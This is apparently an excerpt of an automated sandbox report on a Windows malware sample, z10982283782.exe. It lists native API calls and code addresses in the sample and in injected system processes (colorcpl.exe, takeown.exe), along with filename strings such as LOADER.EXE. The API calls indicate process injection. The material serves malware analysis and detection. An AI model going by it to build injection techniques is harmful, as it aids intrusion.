              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03092DD0 NtDelayExecution,LdrInitializeThunk, | 13_2_03092DD0
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03092DF0 NtQuerySystemInformation,LdrInitializeThunk, | 13_2_03092DF0
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03092C60 NtCreateKey,LdrInitializeThunk, | 13_2_03092C60
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03092C70 NtFreeVirtualMemory,LdrInitializeThunk, | 13_2_03092C70
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03092CA0 NtQueryInformationToken,LdrInitializeThunk, | 13_2_03092CA0
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_030935C0 NtCreateMutant,LdrInitializeThunk, | 13_2_030935C0
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_030939B0 NtGetContextThread,LdrInitializeThunk, | 13_2_030939B0
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03092B80 NtQueryInformationFile, | 13_2_03092B80
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03092AB0 NtWaitForSingleObject, | 13_2_03092AB0
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03092F60 NtCreateProcessEx, | 13_2_03092F60
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03092F90 NtProtectVirtualMemory, | 13_2_03092F90
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03092FA0 NtQuerySection, | 13_2_03092FA0
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03092E30 NtWriteVirtualMemory, | 13_2_03092E30
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03092EA0 NtAdjustPrivilegesToken, | 13_2_03092EA0
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03092D00 NtSetInformationFile, | 13_2_03092D00
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03092DB0 NtEnumerateKey, | 13_2_03092DB0
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03092C00 NtQueryInformationProcess, | 13_2_03092C00
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03092CC0 NtQueryVirtualMemory, | 13_2_03092CC0
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03092CF0 NtOpenProcess, | 13_2_03092CF0
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03093010 NtOpenDirectoryObject, | 13_2_03093010
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03093090 NtSetValueKey, | 13_2_03093090
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03093D10 NtOpenProcessToken, | 13_2_03093D10
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03093D70 NtOpenThread, | 13_2_03093D70
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_00699120 NtCreateFile, | 13_2_00699120
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_00699290 NtReadFile, | 13_2_00699290
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_00699390 NtDeleteFile, | 13_2_00699390
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_00699440 NtClose, | 13_2_00699440
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_006995A0 NtAllocateVirtualMemory, | 13_2_006995A0
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_00CEF9CF NtUnmapViewOfSection, | 13_2_00CEF9CF
              Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02AB8128 CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess, | 0_2_02AB8128
              Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02A920C4 | 0_2_02A920C4
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_06608353 | 10_2_06608353
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_065FFE03 | 10_2_065FFE03
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_065FDE83 | 10_2_065FDE83
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_065F24D0 | 10_2_065F24D0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_0660652F | 10_2_0660652F
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_06606533 | 10_2_06606533
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_065F2D00 | 10_2_065F2D00
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_065FFBDB | 10_2_065FFBDB
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_065FFBE3 | 10_2_065FFBE3
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_065F11D0 | 10_2_065F11D0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_065F11CD | 10_2_065F11CD
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_0661E9C3 | 10_2_0661E9C3
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_065F21A0 | 10_2_065F21A0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227D0274 | 10_2_227D0274
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227B02C0 | 10_2_227B02C0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227EA352 | 10_2_227EA352
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2273E3F0 | 10_2_2273E3F0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227F03E6 | 10_2_227F03E6
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227C2000 | 10_2_227C2000
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227B8158 | 10_2_227B8158
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227CA118 | 10_2_227CA118
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22720100 | 10_2_22720100
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227E81CC | 10_2_227E81CC
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227F01AA | 10_2_227F01AA
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227E41A2 | 10_2_227E41A2
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2274C6E0 | 10_2_2274C6E0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22730770 | 10_2_22730770
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22754750 | 10_2_22754750
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2272C7C0 | 10_2_2272C7C0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227E2446 | 10_2_227E2446
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227D4420 | 10_2_227D4420
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227DE4F6 | 10_2_227DE4F6
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22730535 | 10_2_22730535
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227F0591 | 10_2_227F0591
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2272EA80 | 10_2_2272EA80
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227EAB40 | 10_2_227EAB40
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227E6BD7 | 10_2_227E6BD7
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2273A840 | 10_2_2273A840
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22732840 | 10_2_22732840
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2275E8F0 | 10_2_2275E8F0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227168B8 | 10_2_227168B8
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22746962 | 10_2_22746962
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227329A0 | 10_2_227329A0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227FA9A6 | 10_2_227FA9A6
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22730E59 | 10_2_22730E59
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227EEE26 | 10_2_227EEE26
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227EEEDB | 10_2_227EEEDB
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22742E90 | 10_2_22742E90
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227ECE93 | 10_2_227ECE93
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227A4F40 | 10_2_227A4F40
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22750F30 | 10_2_22750F30
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227D2F30 | 10_2_227D2F30
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22772F28 | 10_2_22772F28
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2273CFE0 | 10_2_2273CFE0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22722FC8 | 10_2_22722FC8
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227AEFA0 | 10_2_227AEFA0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22730C00 | 10_2_22730C00
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22720CF2 | 10_2_22720CF2
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227D0CB5 | 10_2_227D0CB5
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227CCD1F | 10_2_227CCD1F
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2273AD00 | 10_2_2273AD00
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2272ADE0 | 10_2_2272ADE0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22748DBF | 10_2_22748DBF
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227D12ED | 10_2_227D12ED
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2274B2C0 | 10_2_2274B2C0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227352A0 | 10_2_227352A0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2271D34C | 10_2_2271D34C
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227E132D | 10_2_227E132D
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2277739A | 10_2_2277739A
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227E70E9 | 10_2_227E70E9
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227EF0E0 | 10_2_227EF0E0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227DF0CC | 10_2_227DF0CC
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227370C0 | 10_2_227370C0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2271F172 | 10_2_2271F172
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227FB16B | 10_2_227FB16B
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2276516C | 10_2_2276516C
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2273B1B0 | 10_2_2273B1B0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22775630 | 10_2_22775630
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227E16CC | 10_2_227E16CC
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227EF7B0 | 10_2_227EF7B0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22721460 | 10_2_22721460
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227EF43F | 10_2_227EF43F
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227E7571 | 10_2_227E7571
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F95C310_2_227F95C3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227CD5B010_2_227CD5B0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A3A6C10_2_227A3A6C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227EFA4910_2_227EFA49
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227E7A4610_2_227E7A46
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227DDAC610_2_227DDAC6
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227CDAAC10_2_227CDAAC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22775AA010_2_22775AA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227D1AA310_2_227D1AA3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227EFB7610_2_227EFB76
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A5BF010_2_227A5BF0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2276DBF910_2_2276DBF9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274FB8010_2_2274FB80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279D80010_2_2279D800
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227338E010_2_227338E0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2273995010_2_22739950
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274B95010_2_2274B950
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227C591010_2_227C5910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22739EB010_2_22739EB0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227EFF0910_2_227EFF09
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_226F3FD510_2_226F3FD5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_226F3FD210_2_226F3FD2
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227EFFB110_2_227EFFB1
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22731F9210_2_22731F92
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A9C3210_2_227A9C32
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227EFCF210_2_227EFCF2
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227E7D7310_2_227E7D73
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227E1D5A10_2_227E1D5A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22733D4010_2_22733D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274FDC010_2_2274FDC0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0311A35213_2_0311A352
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_031203E613_2_031203E6
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0306E3F013_2_0306E3F0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0310027413_2_03100274
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030E02C013_2_030E02C0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0305010013_2_03050100
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030FA11813_2_030FA118
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030E815813_2_030E8158
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_031141A213_2_031141A2
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_031201AA13_2_031201AA
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_031181CC13_2_031181CC
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030F200013_2_030F2000
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0308475013_2_03084750
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0306077013_2_03060770
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0305C7C013_2_0305C7C0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0307C6E013_2_0307C6E0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0306053513_2_03060535
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0312059113_2_03120591
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0310442013_2_03104420
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0311244613_2_03112446
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0310E4F613_2_0310E4F6
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0311AB4013_2_0311AB40
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03116BD713_2_03116BD7
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0305EA8013_2_0305EA80
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0307696213_2_03076962
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030629A013_2_030629A0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0312A9A613_2_0312A9A6
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0306284013_2_03062840
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0306A84013_2_0306A840
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030468B813_2_030468B8
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0308E8F013_2_0308E8F0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03102F3013_2_03102F30
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030A2F2813_2_030A2F28
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03080F3013_2_03080F30
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030D4F4013_2_030D4F40
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030DEFA013_2_030DEFA0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03052FC813_2_03052FC8
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0306CFE013_2_0306CFE0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0311EE2613_2_0311EE26
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03060E5913_2_03060E59
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0311CE9313_2_0311CE93
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03072E9013_2_03072E90
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0311EEDB13_2_0311EEDB
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0306AD0013_2_0306AD00
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030FCD1F13_2_030FCD1F
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03078DBF13_2_03078DBF
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0305ADE013_2_0305ADE0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03060C0013_2_03060C00
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03100CB513_2_03100CB5
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03050CF213_2_03050CF2
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0311132D13_2_0311132D
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0304D34C13_2_0304D34C
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030A739A13_2_030A739A
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030652A013_2_030652A0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0307B2C013_2_0307B2C0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_031012ED13_2_031012ED
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0309516C13_2_0309516C
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0304F17213_2_0304F172
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0312B16B13_2_0312B16B
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0306B1B013_2_0306B1B0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030670C013_2_030670C0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0310F0CC13_2_0310F0CC
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0311F0E013_2_0311F0E0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_031170E913_2_031170E9
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0311F7B013_2_0311F7B0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030A563013_2_030A5630
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_031116CC13_2_031116CC
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0311757113_2_03117571
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030FD5B013_2_030FD5B0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_031295C313_2_031295C3
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0311F43F13_2_0311F43F
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0305146013_2_03051460
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0311FB7613_2_0311FB76
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0307FB8013_2_0307FB80
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0309DBF913_2_0309DBF9
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030D5BF013_2_030D5BF0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03117A4613_2_03117A46
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0311FA4913_2_0311FA49
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030D3A6C13_2_030D3A6C
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030FDAAC13_2_030FDAAC
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030A5AA013_2_030A5AA0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03101AA313_2_03101AA3
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0310DAC613_2_0310DAC6
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030F591013_2_030F5910
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0306995013_2_03069950
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0307B95013_2_0307B950
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030CD80013_2_030CD800
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030638E013_2_030638E0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0311FF0913_2_0311FF09
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03061F9213_2_03061F92
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0311FFB113_2_0311FFB1
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03069EB013_2_03069EB0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03063D4013_2_03063D40
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03111D5A13_2_03111D5A
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03117D7313_2_03117D73
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0307FDC013_2_0307FDC0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030D9C3213_2_030D9C32
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0311FCF213_2_0311FCF2
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_00681D1013_2_00681D10
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0067CC6013_2_0067CC60
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0067CC5813_2_0067CC58
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0067CE8013_2_0067CE80
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0067AF0013_2_0067AF00
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_006853D013_2_006853D0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_006835AC13_2_006835AC
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_006835B013_2_006835B0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0069BA4013_2_0069BA40
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_00CEE34513_2_00CEE345
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_00CEE46313_2_00CEE463
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_00CED86813_2_00CED868
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_00CEE80713_2_00CEE807
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_00CECB0813_2_00CECB08
              Source: C:\Windows\SysWOW64\takeown.exeCode function: String function: 030DF290 appears 105 times
              Source: C:\Windows\SysWOW64\takeown.exeCode function: String function: 03095130 appears 58 times
              Source: C:\Windows\SysWOW64\takeown.exeCode function: String function: 030A7E54 appears 111 times
              Source: C:\Windows\SysWOW64\takeown.exeCode function: String function: 030CEA12 appears 86 times
              Source: C:\Windows\SysWOW64\takeown.exeCode function: String function: 0304B970 appears 277 times
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: String function: 02AA89D0 appears 45 times
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: String function: 02AA894C appears 56 times
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: String function: 02A946D4 appears 244 times
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: String function: 02A94500 appears 33 times
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: String function: 02A94860 appears 949 times
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: String function: 02A944DC appears 74 times
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 22777E54 appears 111 times
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 22765130 appears 58 times
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 2279EA12 appears 82 times
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 227AF290 appears 103 times
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 2271B970 appears 277 times
              Source: z10982283782.exeBinary or memory string: OriginalFilename vs z10982283782.exe
              Source: z10982283782.exe, 00000000.00000002.1351975173.00000000028F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs z10982283782.exe
              Source: z10982283782.exe, 00000000.00000003.1236423933.0000000002900000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs z10982283782.exe
              Source: z10982283782.exe, 00000000.00000003.1236633827.000000007F8FF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs z10982283782.exe
              Source: z10982283782.exe, 00000000.00000003.1236633827.000000007F8FF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs z10982283782.exe
              Source: z10982283782.exe, 00000000.00000003.1236423933.00000000028FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs z10982283782.exe
              Source: z10982283782.exe, 00000000.00000003.1235919667.000000007FB0F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs z10982283782.exe
              Source: z10982283782.exe, 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs z10982283782.exe
              Source: z10982283782.exe, 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs z10982283782.exe
              Source: z10982283782.exe, 00000000.00000002.1351975173.00000000028F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs z10982283782.exe
              Source: z10982283782.exe, 00000000.00000002.1416330856.000000007FA2F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs z10982283782.exe
              Source: z10982283782.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
